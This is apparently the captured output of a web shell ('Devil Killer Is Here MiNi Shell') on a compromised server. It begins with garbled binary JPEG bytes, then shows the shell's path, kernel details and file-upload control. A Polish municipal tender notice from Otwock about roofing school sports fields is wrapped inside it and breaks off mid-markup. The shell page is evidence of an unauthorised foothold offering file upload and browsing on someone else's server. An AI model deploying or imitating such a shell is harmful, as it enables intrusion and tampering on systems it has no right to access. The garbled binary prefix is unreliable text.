JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230822/0036269401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie w systemie „zaprojektuj i wybuduj” kompletnej dokumentacji projektowo-kosztorysowej oraz wykonanie na jej podstawie robót budowlanych dla zadania inwestycyjnego pn: &#34;Budowa zadaszenia (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Otwock</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013268770</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@otwock.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.otwock.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie w systemie „zaprojektuj i wybuduj” kompletnej dokumentacji projektowo-kosztorysowej oraz wykonanie na jej podstawie robót budowlanych dla zadania inwestycyjnego pn: &#34;Budowa zadaszenia (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b393fe46-3da6-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00362694</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://otwock.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja za pośrednictwem Platformy Zamawiającego https://otwock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu<br/>Zamawiający dopuszcza możliwość przekazywania sobie przez strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji:1.1. Elektronicznie za pośrednictwem Platformy znajdującej się<br/>pod adresem: https://otwock.ezamawiajacy.pl w zakładce„Korespondencja”.2. Ogólne zasady korzystania z Platformy,<br/>;2.1.zgłoszenie do postępowania<br/>wymaga zalogowania Wykonawcy do Systemu na subdomenie Miasto Otwock ;<br/>https://otwock.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.2.2. Wykonawca po wybraniu opcji „przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e -mail, ustanawia hasło, następnie powtarza<br/>hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 2.3. Rejestracja Wykonawcy trwa maksymalnie<br/>do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w<br/>procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informacje, o możliwości<br/>przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu. 2.4.Po założeniu konta Wykonawca ma możliwość<br/>złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.3.Zamawiający zgodnie określa dopuszczalny format podpisu elektronicznego, jako:3.1. dokumenty w formacie<br/>„pdf&#34; zaleca się podpisywać formatem PAdES,3.2. dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie<br/>wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu<br/>oddzielny plik z podpisem.4.Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB wtxt,<br/>rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,wav, mp3, avi, mpg, mpeg, mp4, m4a,<br/>mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd,gml, rng, xsl, xslt,TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>5. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:5.1. Plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8.Możliwość otworzenia<br/>pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.6. Oznaczenie czasu odbioru<br/>danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.45.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Wykonanie, w systemie „zaprojektuj i wybuduj”, kompletnej dokumentacji projektowokosztorysowej<br/>oraz wykonanie na jej podstawie robót budowlanych dla zadania inwestycyjnego pn.:<br/>Część I: „Budowa zadaszenia o stałej konstrukcji istniejącego boiska wielofunkcyjnego przy Szkole Podstawowej nr 2 im.<br/>Ireny Sendlerowej w Otwocku”, w ramach zadania budżetowego pn. „Budowa zadaszenia o stałej konstrukcji istniejącego<br/>boiska wielofunkcyjnego przy Szkole Podstawowej nr 2 im. Ireny Sendlerowej w Otwocku” oraz udzielenie gwarancji na<br/>wykonany przedmiot zamówienia.<br/>1. Przedmiot zamówienia realizowany będzie zgodnie z Programem Funkcjonalno-Użytkowym zawartym w Załączniku nr 1<br/>do umowy i określonym w nim zakresem w podziale<br/>na następujące etapy:<br/>a) Etap I obejmuje: wykonanie inwentaryzacji w zakresie niezbędnym do wykonania przedmiotu zamówienia, koncepcji i<br/>następnie kompletnego projektu budowlanego i technicznych projektów branżowych wraz z dokumentacją kosztorysową i<br/>uzyskanie ostatecznego pozwolenia na budowę,<br/>b) Etap II obejmuje: wykonanie wszystkich robót i czynności związanych z wykonaniem obiektu wymienionych w PFU oraz<br/>zgodnie z opracowaną dokumentacją projektową, pełnienie nadzoru autorskiego nad realizacją robót budowalnych<br/>wykonanie i przekazanie dokumentacji powykonawczej,<br/>c) Etap III obejmuje: przeprowadzenie odbiorów, przeprowadzenie szkoleń personelu użytkownika, uzyskanie pozwolenia na<br/>użytkowanie nowopowstałych obiektów.<br/>2. W ramach wykonania przedmiotu umowy Wykonawca w szczególności:<br/>1) wykona kompletną dokumentację projektową, uzyska pozwolenie na budowę i niezbędne zgody opinie i uzgodnienia oraz<br/>zapewni nadzór autorski nad realizacją robót budowlanych realizowanych na podstawie ww. projektu,<br/>2) wykona wszystkie czynności związane z wykonaniem obiektu, z uwzględnieniem podziału wykonania przedmiotu<br/>zamówienia na Etapy, części i zakresy, w szczególności:<br/>a) roboty budowlane polegające na rozbiórce istniejącej infrastruktury obiektu, przygotowaniu terenu, budowie zadaszenia<br/>istniejącego boiska w formie hali łukowej wraz z zapleczem sanitarno-szatniowym oraz infrastrukturą towarzyszącą,<br/>instalacjami i urządzeniami technologicznymi,<br/>b) dostosowanie zagospodarowania terenu w związku z uruchomieniem nowego obiektu na terenie funkcjonującej Szkoły<br/>Podstawowej w zakresie niezbędnej przebudowy chodników oraz urządzenia/uzupełnienia terenów zielonych,<br/>c) dostawę oraz instalację wyposażenia obiektu w sprzęt i niezbędne umeblowanie wraz z wyposażeniem sportowym,<br/>d) rozruch wszystkich urządzeń, zgodnie z zatwierdzoną dokumentacją projektową,<br/>3) wykona dokumentację powykonawczą;<br/>4) uzyska pozwolenie na użytkowanie nowych obiektów;<br/>5) przeniesie na Zamawiającego majątkowe prawa autorskie do dokumentacji projektowej, oraz do dokumentacji<br/>powykonawczej;<br/>6) udzieli gwarancji i rękojmi na wykonane roboty i dostarczone w ramach zamówienia elementy w szczególności:<br/>dokumentację, urządzenia, systemy wyposażenie i instalacje na warunkach określonych w umowie.<br/>3. Zakres rzeczowy przedmiotu zamówienia określa Program Funkcjonalno-Użytkowy i umowa zawarte w Specyfikacji<br/>Warunków Zamówienia, która wraz ofertą przetargową Wykonawcy stanowić będą integralną całość umowy zawartej w<br/>wyniku przeprowadzonego postępowania.<br/>4. Przedmiot zamówienia będzie wykonywany zgodnie z zasadami wiedzy technicznej i sztuki budowlanej, zgodnie z<br/>obowiązującymi przepisami, normami oraz na warunkach ustalonych z Wykonawcą i Zamawiającym na podstawie umowy.<br/>5. W trakcie przygotowywania oferty Wykonawca winien dokonać wizji lokalnej na terenie prowadzenia przyszłych prac,<br/>wszelkie niezgodności projektu ze stanem istniejącym<br/>są ryzykiem Wykonawcy i nie są podstawą do roszczeń o dodatkowe koszty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45212220-4 - Roboty budowlane związane z wielofunkcyjnymi obiektami sportowymi</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45212230-7 - Instalowanie szatni</p> <p class="mb-0">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 305 pkt 1) w związku z art. 214 ust. 1 pkt. 7 o wartości netto: cz. 1 - do kwoty<br/>930 000,00 zł. w zakresie polegającym na powtórzeniu podobnych rodzajowo prac zgodnych z przedmiotem zamówienia<br/>podstawowego, w tym pozostających w zgodności z podstawowym zamierzeniem budowlanym oraz związanym bezpośrednio przez<br/>identyfikację zamówienia z realizacją podstawowego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Wykonanie, w systemie „zaprojektuj i wybuduj”, kompletnej dokumentacji projektowokosztorysowej<br/>oraz wykonanie na jej podstawie robót budowlanych dla zadania inwestycyjnego pn.:<br/>Część II: „Budowa zadaszenia o stałej konstrukcji istniejącego boiska wielofunkcyjnego przy Szkole Podstawowej nr 4 im.<br/>Józefa Piłsudskiego w Otwocku”, w ramach zadania budżetowego pn. „Budowa zadaszenia o stałej konstrukcji istniejącego<br/>boiska wielofunkcyjnego przy Szkole Podstawowej nr 4 im. Józefa Piłsudskiego w Otwocku” oraz udzielenie gwarancji na<br/>wykonany przedmiot zamówienia.<br/>1. Przedmiot zamówienia realizowany będzie zgodnie z Programem Funkcjonalno-Użytkowym zawartym w Załączniku nr 1<br/>do umowy i określonym w nim zakresem w podziale<br/>na następujące etapy:<br/>a) Etap I obejmuje: wykonanie inwentaryzacji w zakresie niezbędnym do wykonania przedmiotu zamówienia, koncepcji i<br/>następnie kompletnego projektu budowlanego i technicznych projektów branżowych wraz z dokumentacją kosztorysową i<br/>uzyskanie ostatecznego pozwolenia na budowę,<br/>b) Etap II obejmuje: wykonanie wszystkich robót i czynności związanych z wykonaniem obiektu wymienionych w PFU oraz<br/>zgodnie z opracowaną dokumentacją projektową, pełnienie nadzoru autorskiego nad realizacją robót budowalnych<br/>wykonanie i przekazanie dokumentacji powykonawczej,<br/>c) Etap III obejmuje: przeprowadzenie odbiorów, przeprowadzenie szkoleń personelu użytkownika, uzyskanie pozwolenia na<br/>użytkowanie nowopowstałych obiektów.<br/>2. W ramach wykonania przedmiotu umowy Wykonawca w szczególności:<br/>1) wykona kompletną dokumentację projektową, uzyska pozwolenie na budowę i niezbędne zgody opinie i uzgodnienia oraz<br/>zapewni nadzór autorski nad realizacją robót budowlanych realizowanych na podstawie ww. projektu,<br/>2) wykona wszystkie czynności związane z wykonaniem obiektu, z uwzględnieniem podziału wykonania przedmiotu<br/>zamówienia na Etapy, części i zakresy, w szczególności:<br/>a) roboty budowlane polegające na rozbiórce istniejącej infrastruktury obiektu, przygotowaniu terenu, budowie zadaszenia<br/>istniejącego boiska w formie hali łukowej wraz z zapleczem sanitarno-szatniowym oraz infrastrukturą towarzyszącą,<br/>instalacjami i urządzeniami technologicznymi,<br/>b) dostosowanie zagospodarowania terenu w związku z uruchomieniem nowego obiektu na terenie funkcjonującej Szkoły<br/>Podstawowej w zakresie niezbędnej przebudowy chodników oraz urządzenia/uzupełnienia terenów zielonych,<br/>c) dostawę oraz instalację wyposażenia obiektu w sprzęt i niezbędne umeblowanie wraz z wyposażeniem sportowym,<br/>d) rozruch wszystkich urządzeń, zgodnie z zatwierdzoną dokumentacją projektową,<br/>3) wykona dokumentację powykonawczą;<br/>4) uzyska pozwolenie na użytkowanie nowych obiektów;<br/>5) przeniesie na Zamawiającego majątkowe prawa autorskie do dokumentacji projektowej, oraz do dokumentacji<br/>powykonawczej;<br/>6) udzieli gwarancji i rękojmi na wykonane roboty i dostarczone w ramach zamówienia elementy w szczególności:<br/>dokumentację, urządzenia, systemy wyposażenie i instalacje na warunkach określonych w umowie.<br/>3. Zakres rzeczowy przedmiotu zamówienia określa Program Funkcjonalno-Użytkowy i umowa zawarte w Specyfikacji<br/>Warunków Zamówienia, która wraz ofertą przetargową Wykonawcy stanowić będą integralną całość umowy zawartej w<br/>wyniku przeprowadzonego postępowania.<br/>4. Przedmiot zamówienia będzie wykonywany zgodnie z zasadami wiedzy technicznej i sztuki budowlanej, zgodnie z<br/>obowiązującymi przepisami, normami oraz na warunkach ustalonych<br/>z Wykonawcą i Zamawiającym na podstawie umowy.<br/>5. W trakcie przygotowywania oferty Wykonawca winien dokonać wizji lokalnej na terenie prowadzenia przyszłych prac,<br/>wszelkie niezgodności projektu ze stanem istniejącym<br/>są ryzykiem Wykonawcy i nie są podstawą do roszczeń o dodatkowe koszty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45212220-4 - Roboty budowlane związane z wielofunkcyjnymi obiektami sportowymi</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45212230-7 - Instalowanie szatni</p> <p class="mb-0">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielanie zamówień, o których mowa w art. 305 pkt 1) w związku z art. 214 ust. 1 pkt. 7 o wartości netto: cz. 2 - do kwoty<br/>750 000,00 zł. w zakresie polegającym na powtórzeniu podobnych rodzajowo prac zgodnych z przedmiotem zamówienia<br/>podstawowego, w tym pozostających w zgodności z podstawowym zamierzeniem budowlanym oraz związanym bezpośrednio przez<br/>identyfikację zamówienia z realizacją podstawowego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 